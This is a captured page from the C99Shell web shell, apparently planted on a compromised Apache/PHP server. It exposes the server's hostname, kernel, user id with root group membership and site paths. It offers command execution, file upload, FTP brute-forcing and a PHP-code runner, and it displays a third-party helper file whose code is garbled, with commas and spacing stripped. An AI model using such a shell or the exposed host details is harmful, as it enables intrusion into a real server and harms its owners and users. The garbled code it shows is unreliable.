!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/spatie/opening-hours/src/Helpers/   drwxr-xr-x
Free 26.67 GB of 117.98 GB (22.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Arr.php (1.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\OpeningHours\Helpers;

class 
Arr
{
    public static function 
filter(array $array, callable $callback): array
    {
        return 
array_filter($array$callbackARRAY_FILTER_USE_BOTH);
    }

    public static function 
map(array $array, callable $callback): array
    {
        
$keys array_keys($array);

        
$items array_map($callback$array$keys);

        return 
array_combine($keys$items);
    }

    public static function 
flatMap(array $array, callable $callback): array
    {
        
$mapped = static::map($array$callback);

        
$flattened = [];

        foreach (
$mapped as $item) {
            if (
is_array($item)) {
                
$flattened array_merge($flattened$item);
            } else {
                
$flattened[] = $item;
            }
        }

        return 
$flattened;
    }

    public static function 
pull(&$array$key$default null)
    {
        
$value $array[$key] ?? $default;

        unset(
$array[$key]);

        return 
$value;
    }

    public static function 
mirror(array $array): array
    {
        return 
array_combine($array$array);
    }

    public static function 
createUniquePairs(array $array): array
    {
        
$pairs = [];

        while (
$a array_shift($array)) {
            foreach (
$array as $b) {
                
$pairs[] = [$a$b];
            }
        }

        return 
$pairs;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0124 ]--